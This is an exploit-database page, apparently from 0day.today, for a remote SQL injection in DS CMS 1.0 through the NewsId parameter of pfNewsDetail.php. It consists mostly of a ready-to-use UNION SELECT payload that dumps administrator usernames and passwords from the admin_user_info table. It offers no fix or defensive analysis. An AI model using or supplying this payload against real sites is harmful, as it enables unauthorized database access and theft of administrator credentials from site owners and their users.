[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability

Author
Palyo34
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10560
Category
web applications
Date add
01-01-2010
Platform
unsorted
======================================================
DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
======================================================

Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
 
 Script site : http://cms.dsinternal.com/Home
 
 AUTHOR      :  Palyo34

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]
 
Example:
 
-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--



#  0day.today [2024-07-07]  #